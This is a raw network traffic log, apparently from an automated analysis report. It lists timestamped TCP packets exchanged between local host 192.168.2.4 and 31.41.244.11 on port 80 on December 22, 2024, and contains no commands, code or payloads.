                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.587913036 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.587965965 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.589205027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.589260101 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.589261055 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.589304924 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.590331078 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.590389013 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.590441942 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.590492010 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.591665983 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.591717005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.591793060 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.591836929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.593095064 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.593149900 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.593208075 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.593255043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.594412088 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.594476938 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.594521999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.594561100 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.595773935 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.595824003 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.595875025 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.595916986 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.597143888 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.597189903 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.597316980 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.597413063 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.598503113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.598553896 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.598620892 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.598670006 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.599852085 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.599901915 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.599976063 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.600025892 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.601224899 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.601284981 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.601356030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.601397991 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.602607965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.602669001 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.602726936 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.602768898 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.603959084 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.604008913 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.604088068 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.604134083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.605319977 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.605370045 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.605443001 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.605489969 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.606677055 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.606726885 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.606792927 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.606842041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.608048916 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.608104944 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.608172894 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.608269930 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.609426022 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.609492064 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.609517097 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.609565973 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.610780954 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.610873938 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.610874891 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.610925913 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.612127066 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.612176895 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.612251043 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.612301111 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.613522053 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.613573074 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.613646984 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.613693953 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.614886999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.614945889 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.615000010 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.615056038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.616241932 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.616302013 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.616329908 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.616375923 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.617602110 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.617654085 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.617728949 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.617784023 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.618973017 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.619024038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.619103909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.619210958 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.620326042 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.620379925 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.620455980 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.620512009 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.621711016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.621764898 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.621817112 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.621865034 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.623110056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.623164892 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.623239040 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.623301029 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.624425888 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.624489069 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.624541044 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.624587059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.625783920 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.625833035 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.625906944 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.625965118 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.627149105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.627199888 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.627274036 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.627334118 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.628550053 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.628606081 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.628643990 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.628688097 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.629880905 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.629934072 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.630007982 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.630099058 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.642986059 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.643109083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.643114090 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.643213987 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.643300056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.643372059 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.643388987 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.643435955 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.644520044 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.644579887 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.644612074 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.644669056 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.645796061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.645853043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.645931959 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.645984888 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.647140980 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.647248983 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.647267103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.647344112 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.648499012 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.648555994 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.648602009 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.648652077 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.649861097 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.649921894 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.649977922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.650038958 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.651223898 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.651297092 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.651391029 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.651448965 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.652590990 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.652647018 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.652719975 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.652781963 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.653973103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.654073954 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.654082060 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.654135942 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.655359030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.655404091 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.655467987 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.655513048 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.656699896 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.656761885 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.656796932 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.656846046 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.658046961 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.658113003 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.658155918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.658205032 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.659429073 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.659488916 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.659512997 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.659560919 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.660806894 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.660856962 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.660919905 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.660969019 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.662149906 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.662201881 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.662266016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.662323952 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.663516998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.663582087 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.663674116 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.663724899 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.664884090 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.664983034 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.664985895 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.665034056 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.666276932 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.666342020 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.666374922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.666428089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.667548895 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.667610884 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.778043032 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.778095961 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.778136969 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.778215885 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.778301954 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.778338909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.778610945 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.778673887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.778675079 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.778723001 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.779068947 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.779130936 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.779213905 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.779252052 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.779269934 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.779308081 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.779975891 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.780030012 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.780121088 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.780158997 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.780175924 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.780203104 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.780874014 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.780927896 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.780978918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.781021118 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.781038046 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.781073093 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.781737089 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.781799078 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.781864882 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.781900883 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.781913996 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.781954050 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.782646894 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.782701015 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.782752037 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.782788992 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.782805920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.782835007 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.783523083 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.783576965 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.783643007 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.783679008 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.783691883 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.783723116 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.784399033 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.784444094 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.784524918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.784560919 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.784573078 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.784609079 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.785290956 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.785341978 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.785409927 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.785446882 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.785459995 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.785495043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.786174059 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.786222935 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.786288977 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.786325932 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.786335945 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.786372900 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.787069082 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.787123919 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.787198067 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.787234068 CET804976531.41.244.11192.168.2.4
